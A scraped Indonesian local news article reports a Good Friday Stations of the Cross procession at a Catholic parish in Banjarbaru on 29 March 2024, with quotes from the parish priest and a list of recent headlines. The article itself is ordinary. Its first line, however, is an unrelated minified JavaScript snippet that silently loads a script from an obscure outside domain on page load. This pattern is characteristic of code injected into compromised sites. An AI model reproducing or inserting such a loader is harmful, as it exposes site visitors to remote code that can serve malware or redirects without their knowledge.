(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Perayaan Jumat Agung di Banjarbaru, Ada Prosesi Tablo Jalan Salib


KANALKALIMANTAN.COM, BANJARBARU – Umat kristiani di Kota Banjarbaru dengan khusyuk memperingati perayaan Jumat Agung di Gereja Paroki Santo Yohanes Pemandi Landasan Ulin, Jumat (29/3/2024) siang.

Dalam peringatan wafat Yesus Kristus ini diawali dengan prosesi visualisasi kisah sengsara Yesus Kristus atau lebih dikenal dengan nama Tablo Jalan Salib.

Prosesi Tablo Jalan Salib sudah dimulai pukul 09.00 Wita, diperankan sejumlah Orang Muda Katolik (OMK) Paroki Landasan Ulin yang menceritakan kisah sengsara Yesus Kristus penuh makna.

Perjalanan penuh makna dikisahkan mulai dari penangkapan, penjatuhan hukuman mati di salib, penyiksaan oleh para algojo dan wafat di kayu salib hingga dimakamkan.

Baca juga: PLN Pastikan Pasokan Listrik di Kalbar Aman Selama Ramadan dan Idulfitri

Pastor Paroki Santo Yohanes Pemandi Landasan Ulin, Petrus Ping Poto MSF. Foto: wanda

Pastor Paroki Santo Yohanes Pemandi Landasan Ulin, Pastor Petrus Ping Poto MSF menuturkan, dalam perjalanan itu, Yesus Kristus memanggul salib sebagai lambang menanggung dosa umat manusia.

“Dan sebagai semua umat beriman kita jangan takut untuk memanggul salib di tengah kehidupan,” ungkap Pastor Petrus Ping Poto MSF, usai prosesi Tablo Jalan Salib, Jumat (29/3/2024) siang.

Melalui perayaan ini juga ditujukan agar umat dapat merasakan ketabahan dan kesabaran Yesus dalam menghadapi tantangan hidup, dan tetap setia kepada Tuhan.

“Lewat tantangan itu kita harus berani memikul salib seperti Tuhan Yesus sendiri karena tanda kesetiaannya Allah kepada bapanya, maka dia rela memikul salib untuk keselamatan umat di seluruh dunia,” jelas dia.

Baca juga: Konsep Baru Informa Duta Mall Banjarmasin, Lima Zonasi Memberikan Inspirasi Berbelanja Furniture

Pastor menjelaskan, prosesi ini bukan sekadar pertunjukan, melainkan sebuah penghayatan iman yang diiringi dengan doa dan perenungan dari umat.

Alhasil prosesi penyaliban yang ditampilkan begitu menyentuh hati sampai membuat puluhan jemaat yang hadir terlihat meneteskan air mata saat menyaksikan peran Yesus yang disalibkan.

“Ada sebanyak 200 umat Katolik yang menghadiri kegiatan ini, puluhan umat terlihat menangis terharu saat para algojo dengan kejamnya menyambuk dan memukuli Yesus Kristus hingga wafatnya di salib,” sebutnya.

Baca juga: Disperkim Kalsel Monev Program Bantuan RTLH di HSU

Sementaran itu, merangkai perayaan Jumat Agung, ratusan jemaat kemudian melangsungkan ibadat perayaan wafatnya Tuhan Yesus Kristus pada pukul 15.00 Wita.

Ibadat masih dilaksanakan dengan khusyuk oleh ratusan jemaat di dalam Gereja Paroki Santo Yohanes Pemandi Landasan Ulin Banjarbaru. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

10 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

10 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

10 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

11 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

11 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

11 jam ago

This website uses cookies.